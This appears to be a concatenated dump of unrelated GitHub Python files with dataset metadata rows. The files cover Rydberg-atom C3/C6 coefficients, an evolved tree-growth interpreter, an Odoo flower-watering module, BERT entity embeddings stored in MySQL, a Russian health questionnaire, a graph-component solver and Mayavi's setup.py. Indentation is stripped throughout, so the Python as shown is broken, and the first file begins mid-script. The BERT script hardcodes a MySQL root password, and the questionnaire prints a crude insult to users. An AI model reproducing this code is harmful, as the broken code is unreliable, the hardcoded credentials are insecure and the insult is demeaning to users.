# Find the largest C3 coefficients for d=0 and d=1, and their corresponding i, j, and transition
largest_i_d0, largest_j_d0, largest_transition_d0, largest_c3_d0, largest_i_d1, largest_j_d1, largest_transition_d1, largest_c3_d1 = find_largest_c3(n, n_2, l, j)
# Print the results
print("For d=0:")
print("Largest C3 of Rb(%dP -> %dS/%dD) = %.3f GHz (µm)^3 (i = %d, j = %d, Transition = %s)" % (n, n-largest_i_d0, n+largest_j_d0, largest_c3_d0, largest_i_d0, largest_j_d0, largest_transition_d0))
print("For d=1:")
print("Largest C3 of Rb(%dP -> %dS/%dD) = %.3f GHz (µm)^3 (i = %d, j = %d, Transition = %s)" % (n, n-largest_i_d1, n+largest_j_d1, largest_c3_d1, largest_i_d1, largest_j_d1, largest_transition_d1))
'--------------------------------------------------'
#resonant interaction of groundstate to excited state with opposite parity
atom = Rubidium(cpp_numerov=False)
dme = atom.getDipoleMatrixElement(63, 1, 1/2, 1/2, 40, 0, 1/2, 1/2, +1)
c3_2 = (
1
/ (4.0 * np.pi * sc.epsilon_0)
* dme
* dme
* C_e**2
* (sc.physical_constants["Bohr radius"][0]) ** 2
)
print("C_3 of Rb(63 S -> 61P) = %.3f GHz (mu m)^3 " % (abs(c3_2) / C_h * 1.0e9))
'================================================='
# Evaluation of the Cs 60S_1/2 C6 coefficient using perturbation theory (Theta=0,phi=0)
l0 = 0
j0 = 0.5
mj0 = 0.5
# Target State
theta = 0
# Polar Angle [0-pi]
phi = 0
# Azimuthal Angle [0-2pi]
dn = 5
# Range of n to consider (n0-dn:n0+dn)
deltaMax = 25e9 # Max pair-state energy difference [Hz]
# Set target-state and extract value
calculation = PairStateInteractions(
Rubidium(), n, l0, j0, n, l0, j0, mj0, mj0
)
C6 = calculation.getC6perturbatively(theta, phi, dn, deltaMax)
print("C6 [%s] = %.2f GHz (mum)^6" % (printStateString(n, l0, j0), C6))
'--------------------------------------------------'
# Define a range of values for n
n_values = range(30, 80)
a_1 = 1 #µm
# Lists to store the C3 and C6 coefficients for d=0 and d=1
c3_values_d0 = []
c3_values_d1 = []
c6_values = []
# Iterate over the values of n
for n in n_values:
# Find the largest C3 coefficients for d=0 and d=1, and their corresponding i, j, and transition
largest_i_d0, largest_j_d0, largest_transition_d0, largest_c3_d0, largest_i_d1, largest_j_d1, largest_transition_d1, largest_c3_d1 = find_largest_c3(n, n_2, l0, j0)
# Append the largest C3 coefficients to the respective c3_values lists
c3_values_d0.append(largest_c3_d0 / a_1**3)
c3_values_d1.append(largest_c3_d1 / a_1**3)
# Calculate the C6 coefficient
calculation = PairStateInteractions(
Rubidium(), n, l0, j0, n, l0, j0, mj0, mj0
)
C6 = calculation.getC6perturbatively(theta, phi, dn, deltaMax)
# Append the C6 coefficient to the c6_values list
c6_values.append(np.abs(C6) / a_1**6)
#Plotting the C3 and C6 coefficientsplt.plot(n_values, c3_values_d1, label="Largest C3 Coefficient")
#plt.plot(n_values, c3_values_d1, label="C3 Coefficient (d=1)")
#plt.plot(n_values, c6_values, label="C6 Coefficient")
'-------------------'
plt.semilogy(n_values, c3_values_d0, label="Largest C3 Coefficient") #CURRENTLY: d=1
plt.semilogy(n_values, c6_values, label="C6 Coefficient")
'-------------------'
plt.xlabel("n")
plt.ylabel("C3, C6 [GHz]")
plt.legend(fontsize = "large", loc="upper left")
plt.title("C3 & C6 coefficients of Rb |n,S>")
plt.savefig('log plot S c3,c6.png', dpi=300)
plt.show()
|
tappelnano/RydbergPTG
|
ARC C3_C6 calc.py
|
ARC C3_C6 calc.py
|
py
| 7,589 |
python
|
en
|
code
| 0 |
github-code
|
6
|
34565307158
|
from random import random, randint
from collections import deque
from math import sin, cos
MAXVAL = 200
MAXINSTR = 12
def new_random_code(length):
return [
(randint(0, MAXINSTR)) if random() > 0.5 else (randint(MAXINSTR + 1, MAXVAL))
for _ in range(length)
]
def point_mutate(code):
code[randint(0, len(code) - 1)] = (
(randint(0, MAXINSTR)) if random() > 0.5 else (randint(MAXINSTR + 1, MAXVAL))
)
def safe_pop(stack, default=0):
try:
return stack.pop()
except IndexError:
return default
def grow_bud(pos, code, n):
offspring = []
history = deque()
ang = 0
stack = deque()
x, y = pos
for instruction in code:
if instruction > 12: # number
stack.append(instruction - 13)
else:
if instruction == 1: # rotCW
history.append((x, y, ang))
ang += safe_pop(stack)
elif instruction == 2: # rotCCW
history.append((x, y, ang))
ang -= safe_pop(stack)
elif instruction == 3: # undo
x, y, ang = safe_pop(history, (x, y, ang))
elif instruction == 4: # move
history.append((x, y, ang))
dist = safe_pop(stack)
x -= sin(ang) * dist
y += cos(ang) * dist
elif instruction == 5: # place
offspring.append((x, y))
elif instruction == 6: # ref n
stack.append(n)
elif instruction == 7: # +
stack.append(safe_pop(stack) + safe_pop(stack))
elif instruction == 8: # -
stack.append(safe_pop(stack) - safe_pop(stack))
elif instruction == 9: # *
stack.append(safe_pop(stack) * safe_pop(stack))
elif instruction == 10: # /
try:
stack.append(safe_pop(stack) / safe_pop(stack, 1))
except ZeroDivisionError:
pass
elif instruction == 11: # ref x
stack.append(x)
elif instruction == 12: # ref y
stack.append(y)
return offspring
def grow_tree(code, iters=3):
bud_positions = [(0, 0)]
branch_positions = []
for n in range(iters):
new_bud_positions = []
for bud_pos in bud_positions:
for new_pos in grow_bud(bud_pos, code, n):
branch_positions.append((*bud_pos, *new_pos))
new_bud_positions.append(new_pos)
bud_positions = new_bud_positions
return bud_positions, branch_positions
|
gwfellows/trees
|
grow.py
|
grow.py
|
py
| 2,644 |
python
|
en
|
code
| 0 |
github-code
|
6
|
5355406850
|
from odoo import models, fields, api
class StockProductionLot(models.Model):
_inherit = "stock.production.lot"
is_flower = fields.Boolean(related='product_id.is_flower', readonly=True)
water_ids = fields.One2many("flower.water", "serial_id")
@api.model_create_multi
def create(self, vals_list):
for vals in vals_list:
product = self.env["product.product"].browse(vals["product_id"])
if product.sequence_id:
vals["name"] = product.sequence_id.next_by_id()
return super().create(vals_list)
def action_water_flower(self):
flowers = self.filtered(lambda rec: rec.is_flower)
for record in flowers:
if record.water_ids:
last_watered_date = record.water_ids[0].watering_date
frequency = record.product_id.flower_id.watering_frequency
today = fields.Date.today()
if (today - last_watered_date).days < frequency:
continue
self.env["flower.water"].create({
"flower_id": record.product_id.flower_id.id,
"watering_date" :fields.Date.today(),
"serial_id": record.id,
})
def action_open_watering_times(self):
self.ensure_one()
action = {
'name': 'Watering Times',
'type': 'ir.actions.act_window',
'res_model': 'flower.water',
'view_mode': 'tree,form',
'domain': [('serial_id', '=', self.id)],
}
return action
|
omar99emad/flower-shop
|
models/stock_production_lot.py
|
stock_production_lot.py
|
py
| 1,586 |
python
|
en
|
code
| 0 |
github-code
|
6
|
74190845628
|
# -*- coding: utf-8 -*-
__author__ = "ALEX-CHUN-YU ([email protected])"
from word2vec import Word2Vec as w2v
import MySQLdb
import numpy as np
from bert_embedding import BertEmbedding
import codecs
import re
# Entity to Vector
class E2V_BERT:
# init
def __init__(self):
self.db = MySQLdb.connect(host = "127.0.0.1", user = "root", passwd = "wmmkscsie", db = "recommender_system", charset = "utf8")
self.cursor = self.db.cursor()
self.articles_ner_tag = []
self.movies_ner_tag = []
# 產生詞典以供後序 experiment 使用
self.entity_and_vector = []
# main function
def e2v_bert(self):
# 透過 bert embedding 產生向量並將生成的 relationship feature 和 scenario feature 存入
self.load_data()
self.extract_vector_and_save_vector(dimension = 768)
# self.produce_entity_vector_table()
# load data
def load_data(self):
# articles ner 221269
self.cursor.execute("SELECT a.id, a.content_ner_tag FROM articles_ner as a, articles as b Where a.id = b.id and a.id >= 0 and a.id <= 0 and b.relationship_type != ''")
self.articles_ner_tag = self.cursor.fetchall()
# movies ner 3722
self.cursor.execute("SELECT a.id, a.storyline_ner_tag FROM movies_ner as a, movies as b Where a.id = b.id and a.id >= 1 and a.id <= 3722 and b.scenario_type != ''")
self.movies_ner_tag = self.cursor.fetchall()
# 取得向量(Using bert) 並產生 relationship feature 和 scenario feature 存入
def extract_vector_and_save_vector(self, dimension):
bert_embedding = BertEmbedding(model = 'bert_12_768_12', dataset_name='wiki_cn', max_seq_length = 50)
# self.articles_ner_tag = [[1, "人:none 失戀:em 悲觀:em 房間:lo 感到:none 難過:em @ 戀情:em 感到:none 傷心:em 值得:none 人:none 人:none 失戀:em@後會:none 傷害自己:ev 事業:none 失敗:ev 事情:none 失敗:em 忘:ev 走:ev"]]
# self.movies_ner_tag = [[1, "戀情:ev 感到:none "], [2, "人:none 失戀:em 悲觀:em 房間:lo 感到:none 難過:em @ 戀情:ev 感到:none "]]
for article_ner_tag in self.articles_ner_tag:
article_id = article_ner_tag[0]
sentences_ner_tag = article_ner_tag[1]
print("article_id:", end = '')
print(article_id)
relationship_e2v_bert = []
scenario_e2v_bert = []
sentences = []
entity_type_position_length_in_sentences = []
for sentence_ner_tag in sentences_ner_tag.split('@'):
if sentences_ner_tag != "":
sentence = ""
entity_type_position_length_in_sentence = []
for term_ner_tag in sentence_ner_tag.split(' '):
if " " not in term_ner_tag and term_ner_tag != "":
# print(term_ner_tag)
term_ner_tag = term_ner_tag.split(':')
term = term_ner_tag[0]
tag = term_ner_tag[1]
position = int(term_ner_tag[2])
length = int(term_ner_tag[3])
entity_type_position_length_in_sentence.append([term, tag, position, length])
sentence += term
sentences.append(sentence)
# print(len(entity_type_position_length_in_sentence))
entity_type_position_length_in_sentences.append(entity_type_position_length_in_sentence)
print(sentences)
print(entity_type_position_length_in_sentences)
results = bert_embedding(sentences)
print("文章長度:", end = "")
print(len(results))
po_vector = np.zeros(dimension)
em_vector = np.zeros(dimension)
ev_vector = np.zeros(dimension)
lo_vector = np.zeros(dimension)
ti_vector = np.zeros(dimension)
po_count = 0
em_count = 0
ev_count = 0
lo_count = 0
ti_count = 0
for i, result in enumerate(results):
print(sentences[i])
print(entity_type_position_length_in_sentences[i])
print(result[0])
for i, entity in enumerate(entity_type_position_length_in_sentences[i]):
entity_vector = np.zeros(dimension)
try:
for i in range(entity[3]):
entity_vector += result[1][entity[2] + 1 + i]
except:
print("some illegal characters")
break
if entity[1] == 'none':
pass
elif entity[1] == 'po':
po_vector += entity_vector
po_count += 1
elif entity[1] == 'em':
em_vector += entity_vector
em_count += 1
elif entity[1] == 'ev':
ev_vector += entity_vector
ev_count += 1
elif entity[1] == 'lo':
lo_vector += entity_vector
lo_count += 1
elif entity[1] == 'ti':
ti_vector += entity_vector
ti_count += 1
# 建立 Bert Table
# self.entity_and_vector.append([entity[0], entity_vector])
print(po_vector[:5])
print(em_vector[:5])
print(ev_vector[:5])
print(lo_vector[:5])
print(ti_vector[:5])
# print(po_count)
# print(em_count)
# print(ev_count)
# print(lo_count)
# print(ti_count)
if po_count == 0:
po_count = 1
if em_count == 0:
em_count = 1
if ev_count == 0:
ev_count = 1
if lo_count == 0:
lo_count = 1
if ti_count == 0:
ti_count = 1
relationship_e2v_bert = np.append(relationship_e2v_bert, po_vector/po_count)
relationship_e2v_bert = np.append(relationship_e2v_bert, em_vector/em_count)
relationship_e2v_bert = np.append(relationship_e2v_bert, ev_vector/ev_count)
relationship_e2v_bert = np.append(relationship_e2v_bert, lo_vector/lo_count)
relationship_e2v_bert = np.append(relationship_e2v_bert, ti_vector/ti_count)
scenario_e2v_bert = np.append(scenario_e2v_bert, em_vector/em_count)
scenario_e2v_bert = np.append(scenario_e2v_bert, ev_vector/ev_count)
print(relationship_e2v_bert.shape)
print(scenario_e2v_bert.shape)
# print(relationship_e2v_bert[1536])
# print(relationship_e2v_bert[2304])
sql = "UPDATE articles_vector SET relationship_e2v_bert=%s, scenario_e2v_bert=%s WHERE id=%s"
val = (str(list(relationship_e2v_bert)), str(list(scenario_e2v_bert)), article_id)
self.cursor.execute(sql, val)
self.db.commit()
print("="*10)
for movie_ner_tag in self.movies_ner_tag:
movie_id = movie_ner_tag[0]
sentences_ner_tag = movie_ner_tag[1]
print("movie_id:", end = '')
print(movie_id)
scenario_e2v_bert = []
sentences = []
entity_type_position_length_in_sentences = []
for sentence_ner_tag in sentences_ner_tag.split('@'):
if sentence_ner_tag != "":
sentence = ""
entity_type_position_length_in_sentence = []
for term_ner_tag in sentence_ner_tag.split(' '):
if " " not in term_ner_tag and term_ner_tag != "":
term_ner_tag = term_ner_tag.split(':')
term = term_ner_tag[0]
tag = term_ner_tag[1]
position = int(term_ner_tag[2])
length = int(term_ner_tag[3])
entity_type_position_length_in_sentence.append([term, tag, position, length])
sentence += term
sentences.append(sentence)
# print(len(entity_type_position_length_in_sentence))
entity_type_position_length_in_sentences.append(entity_type_position_length_in_sentence)
print(sentences)
print(entity_type_position_length_in_sentences)
results = bert_embedding(sentences)
print("故事情節長度:", end = "")
print(len(results))
em_vector = np.zeros(dimension)
ev_vector = np.zeros(dimension)
em_count = 0
ev_count = 0
for i, result in enumerate(results):
print(sentences[i])
print(entity_type_position_length_in_sentences[i])
print(result[0])
for i, entity in enumerate(entity_type_position_length_in_sentences[i]):
entity_vector = np.zeros(dimension)
try:
for i in range(entity[3]):
entity_vector += result[1][entity[2] + 1 + i]
except:
print("some illegal characters")
break
if entity[1] == 'none':
pass
elif entity[1] == 'po':
pass
elif entity[1] == 'em':
em_vector += entity_vector
em_count += 1
elif entity[1] == 'ev':
ev_vector += entity_vector
ev_count += 1
elif entity[1] == 'lo':
pass
elif entity[1] == 'ti':
pass
# self.entity_and_vector.append([entity[0], entity_vector])
print(em_vector[:5])
print(ev_vector[:5])
# print(em_count)
# print(ev_count)
if em_count == 0:
em_count = 1
if ev_count == 0:
ev_count = 1
scenario_e2v_bert = np.append(scenario_e2v_bert, em_vector/em_count)
scenario_e2v_bert = np.append(scenario_e2v_bert, ev_vector/ev_count)
print(scenario_e2v_bert.shape)
sql = "UPDATE movies_vector SET scenario_e2v_bert=%s WHERE id=%s"
val = (str(list(scenario_e2v_bert)), movie_id)
self.cursor.execute(sql, val)
self.db.commit()
print("="*10)
# 產生 entity 對應的 vector 表(entity 不可重複)
def produce_entity_vector_table(self):
entity_dict = {}
entity_count = {}
mode = "w"
file = "e2v_bert_table.txt"
with codecs.open(file, mode = mode, encoding = 'utf8') as vector_table:
for entity_vector in self.entity_and_vector:
if entity_vector[0] not in entity_dict.keys():
entity_dict[entity_vector[0]] = entity_vector[1]
entity_count[entity_vector[0]] = 1
else:
entity_dict[entity_vector[0]] = entity_dict[entity_vector[0]] + entity_vector[1]
entity_count[entity_vector[0]] = entity_count[entity_vector[0]] + 1
for entity, count in entity_count.items():
entity_dict[entity] = entity_dict[entity]/count
for entity, vector in entity_dict.items():
vector_table.write(entity + ":")
vector_table.write(str(list(vector)))
vector_table.write("\n")
vector_table.close()
if __name__ == "__main__":
e2v_bert = E2V_BERT()
e2v_bert.e2v_bert()
|
Alex-CHUN-YU/Recommender-System
|
main_embedding/e2v_bert.py
|
e2v_bert.py
|
py
| 9,420 |
python
|
en
|
code
| 0 |
github-code
|
6
|
31237691124
|
# 3: Создайте программу “Медицинская анкета”, где вы запросите у пользователя следующие данные: имя, фамилия, возраст и вес.
# Выведите результат согласно которому:
# Пациент в хорошем состоянии, если ему до 30 лет и вес от 50 и до 120 кг,
# Пациенту требуется заняться собой, если ему более 30 и вес меньше 50 или больше 120 кг
# Пациенту требуется врачебный осмотр, если ему более 40 и вес менее 50 или больше 120 кг.
# Все остальные варианты вы можете обработать на ваш вкус и полет фантазии.
name = input('Введите свое имя: ')
last_name = input('Введите свою фамилию: ')
age = int(input('введите свой возраст: '))
weight = int(input('введите свой вес: '))
if age <= 30 and weight >= 50 and weight <= 120:
print(f'{name}{last_name}, {age} лет, вес {weight} - хорошее состояние')
elif age > 30 and age <= 40 and (weight < 50 or weight > 120):
print(f'{name}{last_name}, {age} лет, вес {weight} - стоит задуматься о здоровье')
elif age > 40 and (weight < 50 or weight > 120):
print(f'{name}{last_name}, {age} лет, вес {weight} - беги е врачу утырок')
|
dreaminkv/python-basics
|
practical-task-1/practical-task-3.py
|
practical-task-3.py
|
py
| 1,573 |
python
|
ru
|
code
| 0 |
github-code
|
6
|
36522225710
|
from sys import setrecursionlimit
import threading
RECURSION_LIMIT = 10 ** 9
STACK_SIZE = 2 ** 26
setrecursionlimit(RECURSION_LIMIT)
threading.stack_size(STACK_SIZE)
def dfs(v, used, g, answer):
used[v] = 1
for u in g[v]:
if used[u] == 0:
dfs(u, used, g, answer)
answer.append(v)
def dfs_2(v, color, cur, g_back):
color[v] = cur
for u in g_back[v]:
if color[u] == 0:
dfs_2(u, color, cur, g_back)
def main():
n, m = map(int , input().split())
g = []
g_back = []
for _ in range(n):
g.append([])
g_back.append([])
for _ in range(m):
pair = list(map(int, input().split()))
g[pair[0] - 1].append(pair[1] - 1)
g_back[pair[1] - 1].append(pair[0] - 1)
used = [0] * n
color = [0] * n
answer = []
for v in range(n):
if used[v] == 0:
dfs(v, used, g, answer)
answer.reverse()
cnt = 0
for v in answer:
if color[v] == 0:
cnt += 1
dfs_2(v, color, cnt, g_back)
ribs = []
for _ in range(max(color)):
ribs.append(set())
for v in range(n):
for u in g[v]:
if color[v] != color[u]:
ribs[color[v]].add(color[u])
result = 0
for r in ribs:
result += len(r)
print(result)
if __name__ == "__main__":
threading.Thread(target=main).start()
|
AverPower/Algorithms_and_Structures
|
10. Graphs - 1/Task D.py
|
Task D.py
|
py
| 1,435 |
python
|
en
|
code
| 0 |
github-code
|
6
|
30354475241
|
import setuptools
from setuptools import Command
try:
import numpy
from numpy.distutils.command import build, install_data, build_src
from numpy.distutils.core import setup
HAS_NUMPY = True
except ImportError:
HAS_NUMPY = False
from distutils.command import build, install_data
from distutils.core import setup
import io
import os
import time
import subprocess
import shutil
import re
import sys
import traceback
from os.path import (abspath, basename, dirname, exists, getmtime, isdir,
join, split)
from distutils.command import clean
from distutils import log
from setuptools.command import develop
MODE = 'normal'
if len(sys.argv) >= 2 and \
('--help' in sys.argv[1:] or
sys.argv[1] in ('--help-commands', 'egg_info', '--version',
'clean', 'sdist')):
MODE = 'info'
info = {}
fname = join('mayavi', '__init__.py')
exec(compile(open(fname).read(), fname, 'exec'), info)
DEFAULT_HTML_TARGET_DIR = join('docs', 'build')
DEFAULT_INPUT_DIR = join('docs', 'source',)
class GenDocs(Command):
description = (
"This command generates generated part of the documentation "
"when needed. It's run automatically before a build_docs, and that's "
"the only time it needs to be run."
)
user_options = [
('None', None, 'this command has no options'),
]
def latest_modified(self, the_path, filetypes='', ignore_dirs=''):
"""Traverses a path looking for the most recently modified file
Parameters
----------
the_path : string
Contains path to be traversed or filename to be inspected.
filetypes : string
Regular expression pattern of files to examine. If specified, other
files are ignored. Otherwise, all files are examined.
ignore_dirs : string
Regular expression pattern of directories to be ignored. If ignore
specified, all directories are walked.
Returns
-------
latest_time : float
Modification time of latest_path.
latest_path : string
Most recently modified file.
Description
-----------
"""
file_re = re.compile(filetypes)
dir_re = re.compile(ignore_dirs)
if not exists(the_path):
return 0, the_path
if isdir(the_path):
latest_time = 0
latest_path = the_path
for root, dirs, files in os.walk(the_path):
if ignore_dirs != '':
# This needs to iterate over a copy of the list. Otherwise,
# as things get removed from the original list, the indices
# become invalid.
for dir in dirs[:]:
if dir_re.search(dir):
dirs.remove(dir)
for file in files:
if filetypes != '':
if not file_re.search(file):
continue
current_file_time = getmtime(join(root, file))
if current_file_time > latest_time:
latest_time = current_file_time
latest_path = join(root, file)
return latest_time, latest_path
else:
return getmtime(the_path), the_path
def mlab_reference(self):
""" If mayavi is installed, run the mlab_reference generator.
"""
# XXX: This is really a hack: the script is not made to be used
# for different projects, but it ended up being. This part is
# mayavi-specific.
mlab_ref_dir = join(DEFAULT_INPUT_DIR, 'mayavi', 'auto')
source_path = 'mayavi'
sources = '(\.py)|(\.rst)$'
excluded_dirs = '^\.'
target_path = mlab_ref_dir
target_time = self.latest_modified(target_path,
ignore_dirs=excluded_dirs)[0]
if (self.latest_modified(source_path, filetypes=sources,
ignore_dirs=excluded_dirs)[0] > target_time
or self.latest_modified('mlab_reference.py')[0] > target_time
or not exists(join('docs', 'source', 'mayavi', 'auto',
'mlab_reference.rst'))):
try:
from mayavi import mlab
from mayavi.tools import auto_doc
print("Generating the mlab reference documentation")
os.system('python mlab_reference.py')
except:
pass
def example_files(self):
""" Generate the documentation files for the examples.
"""
mlab_ref_dir = join(DEFAULT_INPUT_DIR, 'mayavi', 'auto')
source_path = join('examples', 'mayavi')
sources = '(\.py)|(\.rst)$'
excluded_dirs = '^\.'
target_path = mlab_ref_dir
target_time = self.latest_modified(target_path,
ignore_dirs=excluded_dirs)[0]
script_file_name = join('docs', 'source', 'render_examples.py')
if (self.latest_modified(source_path, filetypes=sources,
ignore_dirs=excluded_dirs)[0] > target_time
or self.latest_modified(script_file_name)[0] > target_time
or not exists(join('docs', 'source', 'mayavi', 'auto',
'examples.rst'))
):
try:
from mayavi import mlab
from mayavi.tools import auto_doc
print("Generating the example list")
subprocess.call('python %s' %
basename(script_file_name), shell=True,
cwd=dirname(script_file_name))
except:
pass
def run(self):
self.mlab_reference()
self.example_files()
def initialize_options(self):
pass
def finalize_options(self):
pass
class BuildDocs(Command):
description = \
"This command generates the documentation by running Sphinx. " \
"It then zips the docs into an html.zip file."
user_options = [
('None', None, 'this command has no options'),
]
def make_docs(self):
if os.name == 'nt':
print("Please impelemnt sphinx building on windows here.")
else:
subprocess.call(['make', 'html'], cwd='docs')
def run(self):
self.make_docs()
def initialize_options(self):
pass
def finalize_options(self):
pass
# Functions to generate the docs
def list_doc_projects():
""" List the different source directories under DEFAULT_INPUT_DIR
for which we have docs.
"""
source_dir = join(abspath(dirname(__file__)),
DEFAULT_INPUT_DIR)
source_list = os.listdir(source_dir)
# Check to make sure we're using non-hidden directories.
source_dirs = [listing for listing in source_list
if isdir(join(source_dir, listing))
and not listing.startswith('.')]
return source_dirs
def list_docs_data_files(project):
""" List the files to add to a project by inspecting the
documentation directory. This works only if called after the
build step, as the files have to be built.
returns a list of (install_dir, [data_files, ]) tuples.
"""
project_target_dir = join(DEFAULT_HTML_TARGET_DIR, project, 'html')
return_list = []
for root, dirs, files in os.walk(project_target_dir, topdown=True):
# Modify inplace the list of directories to walk
dirs[:] = [d for d in dirs if not d.startswith('.')]
if len(files) == 0:
continue
install_dir = root.replace(project_target_dir, join(project, 'html'))
return_list.append((install_dir, [join(root, f) for f in files]))
return return_list
def _tvtk_built_recently(zipfile, delay):
"""Returns True if the TVTK classes in zipfile was built in the last
delay seconds.
"""
if not os.path.exists(zipfile):
return False
ctime = os.stat(zipfile).st_ctime
tdiff = time.time() - ctime
return tdiff < delay
# Our custom distutils hooks
def build_tvtk_classes_zip():
MY_DIR = os.path.dirname(__file__)
zipfile = os.path.join(MY_DIR, 'tvtk', 'tvtk_classes.zip')
if _tvtk_built_recently(zipfile, delay=120):
print("Already built tvtk_classes.zip")
return
else:
print("Building tvtk_classes.zip")
sys.path.insert(0, MY_DIR)
import tvtk
tvtk_dir = 'tvtk'
sys.path.insert(0, tvtk_dir)
from setup import gen_tvtk_classes_zip
gen_tvtk_classes_zip()
sys.path.remove(tvtk_dir)
sys.path.remove(MY_DIR)
class MyBuild(build.build):
""" A build hook to generate the documentation.
We sub-class numpy.distutils' build command because we're relying on
numpy.distutils' setup method to build python extensions.
"""
def run(self):
build_tvtk_classes_zip()
build.build.run(self)
class MyBuildSrc(build_src.build_src):
"""Build hook to generate the TVTK ZIP files.
We do it here also because for editable installs, setup.py build is not
called.
"""
def run(self):
build_tvtk_classes_zip()
build_src.build_src.run(self)
class MyDevelop(develop.develop):
""" A hook to build the TVTK ZIP file on develop.
Subclassing setuptools' command because numpy.distutils doesn't
have an implementation.
"""
def run(self):
# Make sure that the 'build_src' command will
# always be inplace when we do a 'develop'.
self.reinitialize_command('build_src', inplace=1)
# tvtk_classes.zip always need to be created on 'develop'.
build_tvtk_classes_zip()
develop.develop.run(self)
class MyInstallData(install_data.install_data):
""" An install hook to copy the generated documentation.
We subclass numpy.distutils' command because we're relying on
numpy.distutils' setup method to build python extensions.
"""
def run(self):
install_data_command = self.get_finalized_command('install_data')
for project in list_doc_projects():
install_data_command.data_files.extend(
list_docs_data_files(project))
# make sure tvtk_classes.zip always get created before putting it
# in the install data.
build_tvtk_classes_zip()
tvtk_dir = 'tvtk'
install_data_command.data_files.append(
(tvtk_dir, [join(tvtk_dir, 'tvtk_classes.zip')]))
install_data.install_data.run(self)
class MyClean(clean.clean):
"""Reimplements to remove the extension module array_ext to guarantee a
fresh rebuild every time. The module hanging around could introduce
problems when doing develop for a different vtk version."""
def run(self):
MY_DIR = os.path.dirname(__file__)
ext_file = os.path.join(
MY_DIR,
"tvtk",
"array_ext" + (".pyd" if sys.platform == "win32" else ".so")
)
if os.path.exists(ext_file):
print("Removing in-place array extensions {}".format(ext_file))
os.unlink(ext_file)
clean.clean.run(self)
# Configure our extensions to Python
def configuration(parent_package=None, top_path=None):
from numpy.distutils.misc_util import Configuration
config = Configuration(None, parent_package, top_path)
config.set_options(
ignore_setup_xxx_py=True,
assume_default_configuration=True,
delegate_options_to_subpackages=True,
quiet=True,
)
config.add_subpackage('tvtk')
config.add_data_dir('mayavi/core/lut')
config.add_data_dir('mayavi/tests/data')
config.add_data_dir('mayavi/tests/csv_files')
config.add_data_dir('mayavi/tools/static')
# Image files.
for pkgdir in ('mayavi', 'tvtk'):
for root, dirs, files in os.walk(pkgdir):
if split(root)[-1] == 'images':
config.add_data_dir(root)
# *.ini files.
config.add_data_dir('tvtk/plugins/scene')
config.add_data_dir('mayavi/preferences')
return config
###########################################################################
# Similar to package_data, but installed before build
build_package_data = {'mayavi.images': ['docs/source/mayavi/_static/m2_about.jpg']}
# Install our data files at build time. This is iffy,
# but we need to do this before distutils kicks in.
for package, files in build_package_data.items():
target_path = package.replace('.', os.sep)
for filename in files:
shutil.copy(filename, target_path)
###########################################################################
# Build the full set of packages by appending any found by setuptools'
# find_packages to those discovered by numpy.distutils.
if HAS_NUMPY:
config = configuration().todict()
else:
# This is just a dummy so the egg_info command works.
config = {'packages': []}
packages = setuptools.find_packages(exclude=config['packages'] +
['docs', 'examples'])
config['packages'] += packages
if MODE != 'info' and not HAS_NUMPY:
msg = '''
Numpy is required to build Mayavi correctly, please install it first.
'''
print('*'*80)
print(msg)
print('*'*80)
raise RuntimeError(msg)
# The actual setup call
if __name__ == '__main__':
setup(
name='mayavi',
version=info['__version__'],
author="Prabhu Ramachandran, et al.",
author_email="[email protected]",
maintainer='ETS Developers',
python_requires='>=3.8',
maintainer_email='[email protected]',
url='http://docs.enthought.com/mayavi/mayavi/',
classifiers=[c.strip() for c in """\
Development Status :: 5 - Production/Stable
Intended Audience :: Developers
Intended Audience :: Science/Research
License :: OSI Approved :: BSD License
Operating System :: MacOS
Operating System :: Microsoft :: Windows
Operating System :: OS Independent
Operating System :: POSIX
Operating System :: Unix
Programming Language :: C
Programming Language :: Python
Topic :: Scientific/Engineering
Topic :: Software Development
Topic :: Software Development :: Libraries
""".splitlines() if len(c.split()) > 0],
cmdclass={
# Work around a numpy distutils bug by forcing the use of the
# setuptools' sdist command.
'sdist': setuptools.command.sdist.sdist,
'build': MyBuild,
'build_src': MyBuildSrc,
'clean': MyClean,
'develop': MyDevelop,
'install_data': MyInstallData,
'gen_docs': GenDocs,
'build_docs': BuildDocs,
},
description='3D scientific data visualization library and application',
download_url=('https://www.github.com/enthought/mayavi'),
entry_points={
'gui_scripts': [
'mayavi2 = mayavi.scripts.mayavi2:main',
'tvtk_doc = tvtk.tools.tvtk_doc:main'
],
'envisage.plugins': [
'tvtk.scene = tvtk.plugins.scene.scene_plugin:ScenePlugin',
'tvtk.scene_ui = tvtk.plugins.scene.ui.scene_ui_plugin:SceneUIPlugin',
'tvtk.browser = tvtk.plugins.browser.browser_plugin:BrowserPlugin',
'mayavi = mayavi.plugins.mayavi_plugin:MayaviPlugin',
'mayavi_ui = mayavi.plugins.mayavi_ui_plugin:MayaviUIPlugin'
],
'tvtk.toolkits': [
'qt4 = tvtk.pyface.ui.qt4.init:toolkit_object',
'qt = tvtk.pyface.ui.qt4.init:toolkit_object',
'wx = tvtk.pyface.ui.wx.init:toolkit_object',
'null = tvtk.pyface.ui.null.init:toolkit_object',
]
},
extras_require=info['__extras_require__'],
include_package_data=True,
install_requires=info['__requires__'],
license="BSD",
long_description=io.open('README.rst', encoding='utf-8').read(),
platforms=["Windows", "Linux", "Mac OS-X", "Unix", "Solaris"],
zip_safe=False,
**config
)
|
enthought/mayavi
|
setup.py
|
setup.py
|
py
| 16,576 |
python
|
en
|
code
| 1,177 |
github-code
|
6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.